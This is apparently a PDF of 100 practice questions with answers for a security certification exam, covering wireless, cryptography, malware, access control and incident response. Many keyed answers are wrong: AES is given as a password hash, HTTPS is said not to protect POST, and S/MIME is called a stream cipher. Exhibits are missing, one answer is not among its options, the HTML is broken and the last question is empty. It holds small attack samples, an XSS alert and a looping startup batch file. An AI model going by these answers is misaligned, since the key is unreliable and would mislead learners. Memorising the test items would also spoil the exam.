100 questions v1.pdf

Question 1

A systems administrator needs to integrate multiple IoT and small embedded devices into the company’s wireless network securely. Which of the following should the administrator implement to ensure low-power and legacy devices can connect to the wireless network?

A. WPS

B. WPA

C. EAP-FAST

D. 802.1X

Answer 1

A. WPS

Question 2

When backing up a database server to LTO tape drives, the following backup schedule is used. Backups take
one hour to complete:

On Friday at 9:00 p.m., there is a RAID failure on the database server. The data must be restored from
backup. Which of the following is the number of backup tapes that will be needed to complete this operation?
A. 1
B. 2
C. 3
D. 4
E. 6

Answer 2

D. 4

Question 3

Management wants to ensure any sensitive data on company-provided cell phones is isolated in a single location that can be remotely wiped if the phone is lost. Which of the following technologies BEST meets this need?
A. Geofencing
B. Containerization
C. Device encryption
D. Sandboxing

Answer 3

B. Containerization

Question 4

A company is planning to utilize its legacy desktop systems by converting them into dummy terminals and
moving all heavy applications and storage to a centralized server that hosts all of the company’s required
desktop applications. Which of the following describes the BEST deployment method to meet these
requirements?
A. IaaS
B. VM sprawl
C. VDI
D. PaaS

Answer 4

C. VDI

Question 5

Joe, a user, reports to the help desk that he can no longer access any documents on his PC. He states that he saw a window appear on the screen earlier, but he closed it without reading it. Upon investigation, the technician sees high disk activity on Joe’s PC. Which of the following types of malware is MOST likely indicated by these findings?

A. Keylogger
B. Trojan
C. Rootkit
D. Crypto-malware

Answer 5

D. Crypto-malware

Question 6

An administrator is implementing a secure web server and wants to ensure that if the web server application is compromised, the application does not have access to other parts of the server or network. Which of the following should the administrator implement? (Choose two.)
A. Mandatory access control
B. Discretionary access control
C. Rule-based access control
D. Role-based access control
E. Attribute-based access control

Answer 6

A. Mandatory access control

C. Rule-based access control

Question 7

A developer has incorporated routines into the source code for controlling the length of the input passed to the
program. Which of the following types of vulnerabilities is the developer protecting the code against?
A. DLL injection
B. Memory leak
C. Buffer overflow
D. Pointer dereference

Answer 7

C. Buffer overflow

Question 8

An application developer has neglected to include input validation checks in the design of the company’s new
web application. An employee discovers that repeatedly submitting large amounts of data, including custom
code, to an application will allow the execution of the custom code at the administrator level. Which of the
following BEST identifies this application attack?
A. Cross-site scripting
B. Clickjacking
C. Buffer overflow
D. Replay

Answer 8

C. Buffer overflow

Question 9

Which of the following identity access methods creates a cookie on the first login to a central authority to allow
logins to subsequent applications without re-entering credentials?
A. Multifactor authentication
B. Transitive trust
C. Federated access
D. Single sign-on

Answer 9

D. Single sign-on

Question 10

A network technician is designing a network for a small company. The network technician needs to implement
an email server and web server that will be accessed by both internal employees and external customers.
Which of the following would BEST secure the internal network and allow access to the needed servers?
A. Implementing a site-to-site VPN for server access.
B. Implementing a DMZ segment for the server.
C. Implementing NAT addressing for the servers.
D. Implementing a sandbox to contain the servers.

Answer 10

B. Implementing a DMZ segment for the server.

Question 11

When used together, which of the following qualify as two-factor authentication?
A. Password and PIN
B. Smart card and PIN
C. Proximity card and smart card
D. Fingerprint scanner and iris scanner

Answer 11

B. Smart card and PIN

Question 12

Ann, a new employee, received an email from an unknown source indicating she needed to click on the
provided link to update her company’s profile. Once Ann clicked the link, a command prompt appeared with
the following output:

Which of the following types of malware was executed?
A. Ransomware
B. Adware
C. Spyware
D. Virus

Answer 12

A. Ransomware

Question 13

A company has a team of penetration testers. This team has located a file on the company file server that they
believe contains cleartext usernames followed by a hash. Which of the following tools should the penetration
testers use to learn more about the content of this file?
A. Exploitation framework
B. Vulnerability scanner
C. Netcat
D. Password cracker

Answer 13

D. Password cracker

Question 14

The Chief Information Security Officer (CISO) in a company is working to maximize protection efforts of
sensitive corporate data. The CISO implements a “100% shred” policy within the organization, with the intent
to destroy any documentation that is not actively in use in a way that it cannot be recovered or reassembled.
Which of the following attacks is this deterrent MOST likely to mitigate?
A. Dumpster diving
B. Whaling
C. Shoulder surfing
D. Vishing

Answer 14

A. Dumpster diving

Question 15

A Chief Information Security Officer (CISO) has instructed the information assurance staff to act upon a fastspreading
virus.
Which of the following steps in the incident response process should be taken NEXT?
A. Identification
B. Eradication
C. Escalation
D. Containment

Answer 15

A. Identification

Question 16

An organization has air gapped a critical system.
Which of the following BEST describes the type of attacks that are prevented by this security measure?
A. Attacks from another local network segment
B. Attacks exploiting USB drives and removable media
C. Attacks that spy on leaked emanations or signals
D. Attacks that involve physical intrusion or theft

Answer 16

A. Attacks from another local network segment

Question 17

An organization wants to ensure network access is granted only after a user or device has been authenticated.
Which of the following should be used to achieve this objective for both wired and wireless networks?
A. CCMP
B. PKCS#12
C. IEEE 802.1X
D. OCSP

Answer 17

C. IEEE 802.1X

Question 18

A security administrator is choosing an algorithm to generate password hashes.
Which of the following would offer the BEST protection against offline brute force attacks?
A. MD5
B. 3DES
C. AES
D. SHA-1

Answer 18

C. AES

Question 19

A security administrator is investigating many recent incidents of credential theft for users accessing the
868B7E94756F6685AFF3084F8F0DEC40
company’s website, despite the hosting web server requiring HTTPS for access. The server’s logs show the
website leverages the HTTP POST method for carrying user authentication details.
Which of the following is the MOST likely reason for compromise?
A. The HTTP POST method is not protected by HTTPS.
B. The web server is running a vulnerable SSL configuration.
C. The HTTP response is susceptible to sniffing.
D. The company doesn’t support DNSSEC.

Answer 19

A. The HTTP POST method is not protected by HTTPS.

Question 20

A user from the financial aid office is having trouble interacting with the finaid directory on the university’s ERP
system. The systems administrator who took the call ran a command and received the following output:
Subsequently, the systems administrator has also confirmed the user is a member of the finaid group on the
ERP system.
Which of the following is the MOST likely reason for the issue?
A. The permissions on the finaid directory should be drwxrwxrwx.
B. The problem is local to the user, and the user should reboot the machine.
C. The files on the finaid directory have become corrupted.
D. The finaid directory is not formatted correctly

Answer 20

A. The permissions on the finaid directory should be drwxrwxrwx.

Question 21

An organization wants to deliver streaming audio and video from its home office to remote locations all over
the world. It wants the stream to be delivered securely and protected from intercept and replay attacks.
Which of the following protocols is BEST suited for this purpose?
A. SSH
B. SIP
C. S/MIME
D. SRTP

Answer 21

D. SRTP

Question 22

A manager makes an unannounced visit to the marketing department and performs a walk-through of the
office. The manager observes unclaimed documents on printers. A closer look at these documents reveals
employee names, addresses, ages, birth dates, marital/dependent statuses, and favorite ice cream flavors.
The manager brings this to the attention of the marketing department head. The manager believes this
information to be PII, but the marketing head does not agree. Having reached a stalemate, which of the
following is the MOST appropriate action to take NEXT?
A. Elevate to the Chief Executive Officer (CEO) for redress; change from the top down usually succeeds.
B. Find the privacy officer in the organization and let the officer act as the arbiter.
C. Notify employees whose names are on these files that their personal information is being compromised.
D. To maintain a working relationship with marketing, quietly record the incident in the risk register.

Answer 22

B. Find the privacy officer in the organization and let the officer act as the arbiter.

Question 23

A security administrator is implementing a secure method that allows developers to place files or objects onto
a Linux server. Developers are required to log in using a username, password, and asymmetric key.
Which of the following protocols should be implemented?
A. SSL/TLS
B. SFTP
C. SRTP
D. IPSec

Answer 23

B. SFTP

Question 24

Which of the following BEST describes the purpose of authorization?
A. Authorization provides logging to a resource and comes after authentication.
B. Authorization provides authentication to a resource and comes after identification.
C. Authorization provides identification to a resource and comes after authentication.
D. Authorization provides permissions to a resource and comes after authentication.

Answer 24

D. Authorization provides permissions to a resource and comes after authentication.

Question 25

A security analyst is emailing PII in a spreadsheet file to an audit validator for after-actions related to a security
assessment. The analyst must make sure the PII data is protected with the following minimum requirements:
Ensure confidentiality at rest.
Ensure the integrity of the original email message.
Which of the following controls would ensure these data security requirements are carried out?
A. Encrypt and sign the email using S/MIME.
B. Encrypt the email and send it using TLS.
C. Hash the email using SHA-1.
D. Sign the email using MD5.

Answer 25

A. Encrypt and sign the email using S/MIME.

Question 26

The network information for a workstation is as follows:
When the workstation’s user attempts to access www.example.com, the URL that actually opens is
www.notexample.com. The user successfully connects to several other legitimate URLs. Which of the
following have MOST likely occurred? (Choose two.)
A. ARP poisoning
B. Buffer overflow
C. DNS poisoning
D. Domain hijacking
E. IP spoofing

Answer 26

C. DNS poisoning
D. Domain hijacking

Question 27

Which of the following implements a stream cipher?
A. File-level encryption
B. IKEv2 exchange
C. SFTP data transfer
D. S/MIME encryption

Answer 27

D. S/MIME encryption

Question 28

A security technician has been assigned data destruction duties. The hard drives that are being disposed of
contain highly sensitive information. Which of the following data destruction techniques is MOST appropriate?
A. Degaussing
B. Purging
C. Wiping
D. Shredding

Answer 28

D. Shredding

Question 29

Which of the following BEST explains how the use of configuration templates reduces organization risk?
A. It ensures consistency of configuration for initial system implementation.
B. It enables system rollback to a last known-good state patches break functionality.
C. It facilitates fault tolerance since applications can be migrated across templates.
D. It improves vulnerability scanning efficiency across multiple systems.

Answer 29

A. It ensures consistency of configuration for initial system implementation.

Question 30

A Chief Information Security Officer (CISO) is performing a BIA for the organization in case of a natural disaster. Which of the following should be at the top of the CISO’s list?

A. Identify redundant and high-availability systems.
B. Identity mission-critical applications and systems.
C. Identify the single point of failure in the system.
D. Identity the impact on safety of the property.

Answer 30

B. Identity mission-critical applications and systems.

Question 31

Which of the following should a technician use to protect a cellular phone that is needed for an investigation, to
ensure the data will not be removed remotely?
A. Air gap
B. Secure cabinet
C. Faraday cage
D. Safe

Answer 31

C. Faraday cage

Question 32

Which of the following is the MOST significant difference between intrusive and non-intrusive vulnerability
scanning?
A. One uses credentials, but the other does not.
B. One has a higher potential for disrupting system operations.
C. One allows systems to activate firewall countermeasures.
D. One returns service banners, including running versions.

Answer 32

B. One has a higher potential for disrupting system operations.

Question 33

While reviewing system logs, a security analyst notices that a large number of end users are changing their
passwords four times on the day the passwords are set to expire. The analyst suspects they are cycling their
passwords to circumvent current password controls. Which of the following would provide a technical control
to prevent this activity from occurring?
A. Set password aging requirements.
B. Increase the password history from three to five.
C. Create an AUP that prohibits password reuse.
D. Implement password complexity requirements.

Answer 33

A. Set password aging requirements.

Question 34

A security analyst is running a credential-based vulnerability scanner on a Windows host. The vulnerability scanner is using the protocol NetBIOS over TCP/IP to connect to various systems, However, the scan does not return any results. To address the issue, the analyst should ensure that which of the following default ports is open on systems?

A. 135

B. 137

C. 3389

D. 5060

Answer 34

B. 137

Question 35

An organization’s research department uses workstations in an air-gapped network. A competitor released products based on files that originated in the research department. Which of the following should management do to improve the security and confidentiality of the research files?

A. Implement multifactor authentication on the workstations.

B. Configure removable media controls on the workstations.

C. Install a web application firewall in the research department. D. Install HIDS on each of the research workstations.

Answer 35

B. Configure removable media controls on the workstations.

Question 36

A company network is currently under attack. Although security controls are in place to stop the attack, the security administrator needs more information about the types of attacks being used. Which of the following network types would BEST help the administrator gather this information?

A. DMZ

B. Guest network

C. Ad hoc

D. Honeynet

Answer 36

D. Honeynet

Question 37

Moving laterally within a network once an initial exploit is used to gain persistent access for the purpose of establishing further control of a system is known as:

A. pivoting.

B. persistence.

C. active reconnaissance.

D. a backdoor

Answer 37

A. pivoting.

Question 38

A systems administrator is increasing the security settings on a virtual host to ensure users on one VM cannot

access information from another VM. Which of the following is the administrator protecting against?

A. VM sprawl

B. VM escape

C. VM migration

D. VM sandboxing

Answer 38

B. VM escape

Question 39

A network administrator is implementing multifactor authentication for employees who travel and use company
devices remotely by using the company VPN. Which of the following would provide the required level of
authentication?
A. 802.1X and OTP
B. Fingerprint scanner and voice recognition
C. RBAC and PIN
D. Username/Password and TOTP

Answer 39

A. 802.1X and OTP

Question 40

Which of the following encryption algorithms require one encryption key? (Choose two.)
A. MD5
B. 3DES
C. BCRYPT
D. RC4
E. DSA

Answer 40

B. 3DES

D. RC4

Question 41

A preventive control differs from a compensating control in that a preventive control is:
A. put in place to mitigate a weakness in a user control.
B. deployed to supplement an existing control that is EOL.
C. relied on to address gaps in the existing control structure.
D. designed to specifically mitigate a risk.

Answer 41

C. relied on to address gaps in the existing control structure.

Question 42

A systems administrator has installed a new UTM that is capable of inspecting SSL/TLS traffic for malicious
payloads. All inbound network traffic coming from the Internet and terminating on the company’s secure web
servers must be inspected. Which of the following configurations would BEST support this requirement?
A. The web servers’ CA full certificate chain must be installed on the UTM.
B. The UTM certificate pair must be installed on the web servers.
C. The web servers’ private certificate must be installed on the UTM.
D. The UTM and web servers must use the same certificate authority.

Answer 42

A. The web servers’ CA full certificate chain must be installed on the UTM.

Question 43

A security administrator receives alerts from the perimeter UTM. Upon checking the logs, the administrator
finds the following output:
Time: 12/25 0300
From Zone: Untrust
To Zone: DMZ
Attacker: externalip.com
Victim: 172.16.0.20
To Port: 80
Action: Alert
868B7E94756F6685AFF3084F8F0DEC40
Severity: Critical
When examining the PCAP associated with the event, the security administrator finds the following
information:

 alert ("Click here for important information regarding your account!<br></br>http://externalip.com/account.php"); 

Which of the following actions should the security administrator take?
A. Upload the PCAP to the IDS in order to generate a blocking signature to block the traffic.
B. Manually copy the

 data from the PCAP file and generate a blocking signature in the HIDS to<br></br>block the traffic for future events.<br></br>C. Implement a host-based firewall rule to block future events of this type from occurring.<br></br>D. Submit a change request to modify the XSS vulnerability signature to TCP reset on future attempts.</p>

Answer 43

B. Manually copy the

 data from the PCAP file and generate a blocking signature in the HIDS to<br></br>block the traffic for future events.</p>

Question 44

Given the information below:
MD5HASH document.doc 049eab40fd36caadlfab10b3cdf4a883
MD5HASH image.jpg 049eab40fd36caadlfab10b3cdf4a883
Which of the following concepts are described above? (Choose two.)
A. Salting
B. Collision
C. Steganography
D. Hashing
E. Key stretching

Answer 44

B. Collision
D. Hashing

Question 45

An organization wishes to allow its users to select devices for business use but does not want to overwhelm
the service desk with requests for too many different device types and models. Which of the following
deployment models should the organization use to BEST meet these requirements?
A. VDI environment
B. CYOD model
C. DAC mode
D. BYOD model

Answer 45

B. CYOD model

Question 46

A state-sponsored threat actor has launched several successful attacks against a corporate network. Although
the target has a robust patch management program in place, the attacks continue in depth and scope, and the
security department has no idea how the attacks are able to gain access. Given that patch management and
vulnerability scanners are being used, which of the following would be used to analyze the attack
methodology?
A. Rogue system detection
B. Honeypots
C. Next-generation firewall
D. Penetration test

Answer 46

B. Honeypots

Question 47

A technician, who is managing a secure B2B connection, noticed the connection broke last night. All
networking equipment and media are functioning as expected, which leads the technician to question certain
PKI components. Which of the following should the technician use to validate this assumption? (Choose two.)
A. PEM
B. CER
C. SCEP
D. CRL
E. OCSP
F. PFX

Answer 47

D. CRL
E. OCSP

Question 48

A security administrator is investigating a report that a user is receiving suspicious emails. The user’s machine
has an old functioning modem installed. Which of the following security concerns need to be identified and
mitigated? (Choose two.)
A. Vishing
B. Whaling
C. Spear phishing
D. Pharming
E. War dialing
F. Hoaxing

Answer 48

C. Spear phishing
E. War dialing

Question 49

Which of the following provides PFS?
A. AES
B. RC4
C. DHE
D. HMAC

Answer 49

C. DHE

Question 50

A Chief Information Officer (CIO) is concerned that encryption keys might be exfiltrated by a contractor. The
CIO wants to keep control over key visibility and management. Which of the following would be the BEST
solution for the CIO to implement?”
A. HSM
B. CA
C. SSH
D. SSL

Answer 50

A. HSM

Question 51

A company recently implemented a new security system. In the course of configuration, the security
administrator adds the following entry:
#Whitelist
USB\VID_13FE&PID_4127&REV_0100
Which of the following security technologies is MOST likely being configured?
A. Application whitelisting
B. HIDS
C. Data execution prevention

Answer 51

D. Removable media control

Question 52

A penetration tester is checking to see if an internal system is vulnerable to an attack using a remote listener.
Which of the following commands should the penetration tester use to verify if this vulnerability exists?
(Choose two.)
A. tcpdump
B. nc
C. nmap
D. nslookup
E. tail
F. tracert

Answer 52

B. nc
C. nmap

Question 53

Which of the following is MOST likely caused by improper input handling?
A. Loss of database tables
B. Untrusted certificate warning
C. Power off reboot loop
D. Breach of firewall ACLs

Answer 53

A. Loss of database tables

Question 54

A security administrator is investigating a possible account compromise. The administrator logs onto a desktop
computer, executes the command notepad.exe c:\Temp\qkakforlkgfkja.1og, and reviews the following:
Lee,\rI have completed the task that was assigned to me\rrespectfully\rJohn\r
https://www.portal.com\rjohnuser\rilovemycat2
Given the above output, which of the following is the MOST likely cause of this compromise?
A. Virus
B. Worm
C. Rootkit
D. Keylogger

Answer 54

D. Keylogger

Question 55

Which of the following command line tools would be BEST to identify the services running in a server?
A. Traceroute
B. Nslookup
C. Ipconfig
D. Netstat

Answer 55

D. Netstat

Question 56

A security administrator needs to conduct a full inventory of all encryption protocols and cipher suites. Which
of the following tools will the security administrator use to conduct this inventory MOST efficiently?
A. tcpdump
B. Protocol analyzer
C. Netstat
D. Nmap

Answer 56

D. Nmap

Question 57

A systems developer needs to provide machine-to-machine interface between an application and a database
server in the production environment. This interface will exchange data once per day. Which of the following
access control account practices would BEST be used in this situation?
A. Establish a privileged interface group and apply read-write permission to the members of that group.
B. Submit a request for account privilege escalation when the data needs to be transferred.
C. Install the application and database on the same server and add the interface to the local administrator
group.
D. Use a service account and prohibit users from accessing this account for development work.

Answer 57

D. Use a service account and prohibit users from accessing this account for development work.

Question 58

Which of the following is unique to a stream cipher?

A. It encrypt 128 bytes at a time.
B. It uses AES encryption.
C. It performs bit-level encryption.
D. It is used in HTTPS.

Answer 58

C. It performs bit-level encryption.

Question 59

Which of the following is an example of federated access management?
A. Windows passing user credentials on a peer-to-peer network
B. Applying a new user account with a complex password
C. Implementing a AAA framework for network access
D. Using a popular website login to provide access to another website

Answer 59

D. Using a popular website login to provide access to another website

Question 60

A security analyst wishes to scan the network to view potentially vulnerable systems the way an attacker
would. Which of the following would BEST enable the analyst to complete the objective?
A. Perform a non-credentialed scan.
B. Conduct an intrusive scan.
C. Attempt escalation of privilege.
D. Execute a credentialed scan.

Answer 60

A. Perform a non-credentialed scan.

Question 61

A company moved into a new building next to a sugar mil. Cracks have been discovered in the walls of the
server room, which is located on the same side as the sugar mill loading docks. The cracks are believed to
have been caused by heavy trucks. Moisture has begun to seep into the server room, causing extreme
humidification problems and equipment failure. Which of the following BEST describes the type of threat the
organization faces?
A. Foundational
B. Man-made
C. Environmental
D. Natural

Answer 61

A. Foundational

Question 62

The president of a company that specializes in military contracts receives a request for an interview. During
the interview, the reporter seems more interested in discussing the president’s family life and personal history
than the details of a recent company success. Which of the following security concerns is this MOST likely an
example of?
A. Insider threat
B. Social engineering
C. Passive reconnaissance
D. Phishing

Answer 62

B. Social engineering

Question 63

A Chief Information Security Officer (CISO) for a school district wants to enable SSL to protect all of the publicfacing servers in the domain. Which of the following is a secure solution that is the MOST cost effective?
A. Create and install a self-signed certificate on each of the servers in the domain.
B. Purchase a load balancer and install a single certificate on the load balancer.
C. Purchase a wildcard certificate and implement it on every server.
D. Purchase individual certificates and apply them to the individual servers.

Answer 63

A. Create and install a self-signed certificate on each of the servers in the domain.

Question 64

A company is experiencing an increasing number of systems that are locking up on Windows startup. The
security analyst clones a machine, enters into safe mode, and discovers a file in the startup process that runs
Wstart.bat.
@echo off
:asdhbawdhbasdhbawdhb
start notepad.exe
start notepad.exe
start calculator.exe
start calculator.exe
goto asdhbawdhbasdhbawdhb
Given the file contents and the system’s issues, which of the following types of malware is present?
A. Rootkit
B. Logic bomb
C. Worm
D. Virus

Answer 64

B. Logic bomb

Question 65

A government organization recently contacted three different vendors to obtain cost quotes for a desktop PC
refresh. The quote from one of the vendors was significantly lower than the other two and was selected for the
purchase. When the PCs arrived, a technician determined some NICs had been tampered with. Which of the
following MOST accurately describes the security risk presented in this situation?
A. Hardware root of trust
B. UEFI
C. Supply chain
D. TPM
E. Crypto-malware
F. ARP poisoning

Answer 65

C. Supply chain

Question 66

A company is examining possible locations for a hot site. Which of the following considerations is of MOST
concern if the replication technology being used is highly sensitive to network latency?
A. Connection to multiple power substations
B. Location proximity to the production site
C. Ability to create separate caged space
D. Positioning of the site across international borders

Answer 66

B. Location proximity to the production site

Question 67

An attacker has gathered information about a company employee by obtaining publicly available information
from the Internet and social networks. Which of the following types of activity is the attacker performing?
A. Pivoting
B. Exfiltration of data
C. Social engineering
D. Passive reconnaissance

Answer 67

D. Passive reconnaissance

Question 68

An organization needs to integrate with a third-party cloud application. The organization has 15000 users and
does not want to allow the cloud provider to query its LDAP authentication server directly. Which of the
following is the BEST way for the organization to integrate with the cloud application?
A. Upload a separate list of users and passwords with a batch import.
B. Distribute hardware tokens to the users for authentication to the cloud.
C. Implement SAML with the organization’s server acting as the identity provider.
D. Configure a RADIUS federation between the organization and the cloud provider.

Answer 68

C. Implement SAML with the organization’s server acting as the identity provider.

Question 69

Which of the following is a security consideration for IoT devices?
A. IoT devices have built-in accounts that users rarely access.
B. IoT devices have less processing capabilities.
C. IoT devices are physically segmented from each other.
D. IoT devices have purpose-built applications.

Answer 69

A. IoT devices have built-in accounts that users rarely access.

Question 70

The Chief Information Officer (CIO) has determined the company’s new PKI will not use OCSP. The purpose
of OCSP still needs to be addressed. Which of the following should be implemented?
A. Build an online intermediate CA.
B. Implement a key escrow.
C. Implement stapling.
D. Install a CRL.

Answer 70

D. Install a CRL.

Question 71

A healthcare company is revamping its IT strategy in light of recent regulations. The company is concerned
about compliance and wants to use a pay-per-use model. Which of the following is the BEST solution?
A. On-premises hosting
B. Community cloud
C. Hosted infrastructure
D. Public SaaS

Answer 71

D. Public SaaS

Question 72

An organization’s policy requires users to create passwords with an uppercase letter, lowercase letter,
number, and symbol. This policy is enforced with technical controls, which also prevents users from using any
of their previous 12 passwords. The quantization does not use single sign-on, nor does it centralize storage of
passwords.
The incident response team recently discovered that passwords for one system were compromised.
Passwords for a completely separate system have NOT been compromised, but unusual login activity has
been detected for that separate system. Account login has been detected for users who are on vacation.
Which of the following BEST describes what is happening?
A. Some users are meeting password complexity requirements but not password length requirements.
B. The password history enforcement is insufficient, and old passwords are still valid across many different
systems.
C. Some users are reusing passwords, and some of the compromised passwords are valid on multiple
systems.
D. The compromised password file has been brute-force hacked, and the complexity requirements are not
adequate to mitigate this risk.

Answer 72

D. The compromised password file has been brute-force hacked, and the complexity requirements are not
adequate to mitigate this risk.

Question 73

Which of the following represents a multifactor authentication system?
A. An iris scanner coupled with a palm print reader and fingerprint scanner with liveness detection.
B. A secret passcode that prompts the user to enter a secret key if entered correctly.
C. A digital certificate on a physical token that is unlocked with a secret passcode.
D. A one-time password token combined with a proximity badge.

Answer 73

D. A one-time password token combined with a proximity badge.

Question 74

A company recently installed fingerprint scanners at all entrances to increase the facility’s security. The
scanners were installed on Monday morning, and by the end of the week it was determined that 1.5% of valid
users were denied entry. Which of the following measurements do these users fall under?
A. FRR
B. FAR
C. CER
D. SLA

Answer 74

A. FRR

Question 75

An attacker has obtained the user ID and password of a datacenter’s backup operator and has gained access
to a production system. Which of the following would be the attacker’s NEXT action?
A. Perform a passive reconnaissance of the network.
B. Initiate a confidential data exfiltration process.
C. Look for known vulnerabilities to escalate privileges.
D. Create an alternate user ID to maintain persistent access.

Answer 75

B. Initiate a confidential data exfiltration process.

Question 76

An organization’s IRP prioritizes containment over eradication. An incident has been discovered where an
attacker outside of the organization has installed cryptocurrency mining software on the organization’s web
servers. Given the organization’s stated priorities, which of the following would be the NEXT step?
A. Remove the affected servers from the network.
B. Review firewall and IDS logs to identify possible source IPs.
C. Identify and apply any missing operating system and software patches.
D. Delete the malicious software and determine if the servers must be reimaged.

Answer 76

B. Review firewall and IDS logs to identify possible source IPs.

Question 77

During a security audit of a company’s network, unsecure protocols were found to be in use. A network administrator wants to ensure browser-based access to company switches is using the most secure protocol.
Which of the following protocols should be implemented?
A. SSH2
B. TLS1.2
C. SSL1.3
D. SNMPv3

Answer 77

B. TLS1.2

Question 78

While monitoring the SIEM, a security analyst observes traffic from an external IP to an IP address of the
business network on port 443. Which of the following protocols would MOST likely cause this traffic?
A. HTTP
B. SSH
C. SSL
D. DNS

Answer 78

C. SSL

Question 79

A technician is required to configure updates on a guest operating system while maintaining the ability to
quickly revert the changes that were made while testing the updates. Which of the following should the
technician implement?
A. Snapshots
B. Revert to known state
C. Rollback to known configuration
D. Shadow copy

Answer 79

A. Snapshots

Question 80

A technician is investigating a report of unusual behavior and slow performance on a company-owned laptop.
The technician runs a command and reviews the following information:
Based on the above information, which of the following types of malware should the technician report?
A. Spyware
B. Rootkit
C. RAT
D. Logic bomb

Answer 80

C. RAT

Question 81

An organization is building a new customer services team, and the manager needs to keep the team focused
on customer issues and minimize distractions. The users have a specific set of tools installed, which they must
use to perform their duties. Other tools are not permitted for compliance and tracking purposes. Team
members have access to the Internet for product lookups and to research customer issues. Which of the
following should a security engineer employ to fulfill the requirements for the manager?
A. Install a web application firewall.
B. Install HIPS on the team’s workstations.
C. Implement containerization on the workstations.
D. Configure whitelisting for the team.

Answer 81

C. Implement containerization on the workstations.

Question 82

An administrator is disposing of media that contains sensitive information. Which of the following will provide
the MOST effective method to dispose of the media while ensuring the data will be unrecoverable?
A. Wipe the hard drive.
B. Shred the hard drive.
C. Sanitize all of the data.
D. Degauss the hard drive.

Answer 82

B. Shred the hard drive.

Question 83

Which of the following is the MOST likely motivation for a script kiddie threat actor?
A. Financial gain
B. Notoriety
C. Political expression
D. Corporate espionage

Answer 83

A. Financial gain

Question 84

After discovering a security incident and removing the affected files, an administrator disabled an unneeded
service that led to the breach. Which of the following steps in the incident response process has the
administrator just completed?
A. Containment
B. Eradication
C. Recovery
D. Identification

Answer 84

B. Eradication

Question 85

A company employee recently retired, and there was a schedule delay because no one was capable of filling
the employee’s position. Which of the following practices would BEST help to prevent this situation in the
future?
A. Mandatory vacation
B. Separation of duties
C. Job rotation
D. Exit interviews

Answer 85

C. Job rotation

Question 86

A security analyst is interested in setting up an IDS to monitor the company network. The analyst has been
told there can be no network downtime to implement the solution, but the IDS must capture all of the network
traffic. Which of the following should be used for the IDS implementation?
A. Network tap
B. Honeypot
C. Aggregation
D. Port mirror

Answer 86

A. Network tap

Question 87

A contracting company recently completed its period of performance on a government contract and would like
to destroy all information associated with contract performance. Which of the following is the best NEXT step
for the company to take?
A. Consult data disposition policies in the contract.
B. Use a pulper or pulverizer for data destruction.
C. Retain the data for a period no more than one year.
D. Burn hard copies containing PII or PHI

Answer 87

A. Consult data disposition policies in the contract.

Question 88

A systems administrator is receiving multiple alerts from the company NIPS. A review of the NIPS logs shows
the following:
reset both: 70.32.200.2:3194 –> 10.4.100.4:80 buffer overflow attempt
reset both: 70.32.200.2:3230 –> 10.4.100.4:80 directory traversal attack
reset client: 70.32.200.2:4019 –> 10.4.100.4:80 Blind SQL injection attack
Which of the following should the systems administrator report back to management?
A. The company web server was attacked by an external source, and the NIPS blocked the attack.
B. The company web and SQL servers suffered a DoS caused by a misconfiguration of the NIPS.
C. An external attacker was able to compromise the SQL server using a vulnerable web application.
D. The NIPS should move from an inline mode to an out-of-band mode to reduce network latency.

Answer 88

A. The company web server was attacked by an external source, and the NIPS blocked the attack.

Question 89

Which of the following BEST distinguishes Agile development from other methodologies in terms of vulnerability management?
A. Cross-functional teams
B. Rapid deployments
C. Daily standups
D. Peer review
E. Creating user stories

Answer 89

C. Daily standups

Question 90

An organization is concerned about video emissions from users’ desktops. Which of the following is the BEST
solution to implement?
A. Screen filters
B. Shielded cables
C. Spectrum analyzers
D. Infrared detection

Answer 90

A. Screen filters

Question 91

A security engineer is analyzing the following line of JavaScript code that was found in a comment field on a
web forum, which was recently involved in a security breach:

Given the line of code above, which of the following BEST represents the attack performed during the breach?
A. CSRF
B. DDoS
C. DoS
D. XSS

Answer 91

D. XSS

Question 92

Which of the following documents would provide specific guidance regarding ports and protocols that should
be disabled on an operating system?
A. Regulatory requirements
B. Secure configuration guide
C. Application installation guides
D. User manuals

Answer 92

B. Secure configuration guide

Question 93

A security analyst is investigating a call from a user regarding one of the websites receiving a 503: Service
Unavailable error. The analyst runs a netstat-an command to discover if the web server is up and
listening. The analyst receives the following output:
TCP 10.1.5.2:80 192.168.2.112:60973 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60974 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60975 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60976 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60977 TIME_WAIT
TCP 10.1.5.2:80 192.168.2.112:60978 TIME_WAIT
Which of the following types of attack is the analyst seeing?
A. Buffer overflow
B. Domain hijacking
C. Denial of service
D. ARP poisoning

Answer 93

C. Denial of service

Question 94

Which of the following serves to warn users against downloading and installing pirated software on company
devices?
A. AUP
B. NDA
C. ISA
D. BPA

Answer 94

A. AUP

Question 95

An organization wants to set up a wireless network in the most secure way. Budget is not a major
consideration, and the organization is willing to accept some complexity when clients are connecting. It is also
willing to deny wireless connectivity for clients who cannot be connected in the most secure manner. Which of
the following would be the MOST secure setup that conforms to the organization’s requirements?
A. Enable WPA2-PSK for older clients and WPA2-Enterprise for all other clients.
B. Enable WPA2-PSK, disable all other modes, and implement MAC filtering along with port security.
C. Use WPA2-Enterprise with RADIUS and disable pre-shared keys.
D. Use WPA2-PSK with a 24-character complex password and change the password monthly.

Answer 95

C. Use WPA2-Enterprise with RADIUS and disable pre-shared keys.

Question 96

A first responder needs to collect digital evidence from a compromised headless virtual host. Which of the
following should the first responder collect FIRST?
A. Virtual memory
B. BIOS configuration
C. Snapshot
D. RAM

Answer 96

C. Snapshot

Question 97

Which of the following BEST explains the difference between a credentialed scan and a non-credentialed
scan?
A. A credentialed scan sees devices in the network, including those behind NAT, while a non-credentialed
scan sees outward-facing applications.
B. A credentialed scan will not show up in system logs because the scan is running with the necessary
authorization, while non-credentialed scan activity will appear in the logs.
C. A credentialed scan generates significantly more false positives, while a non-credentialed scan generates
fewer false positives.
D. A credentialed scan sees the system the way an authorized user sees the system, while a noncredentialed scan sees the system as a guest.

Answer 97

D. A credentialed scan sees the system the way an authorized user sees the system, while a noncredentialed scan sees the system as a guest.

Question 98

Using a one-time code that has been texted to a smartphone is an example of:
A. something you have.
B. something you know.
C. something you do.
D. something you are.

Answer 98

A. something you have.

Question 99

The exploitation of a buffer-overrun vulnerability in an application will MOST likely lead to:
A. arbitrary code execution.
B. resource exhaustion.
C. exposure of authentication credentials.
D. dereferencing of memory pointers.

Answer 99

A. arbitrary code execution.

Question 100

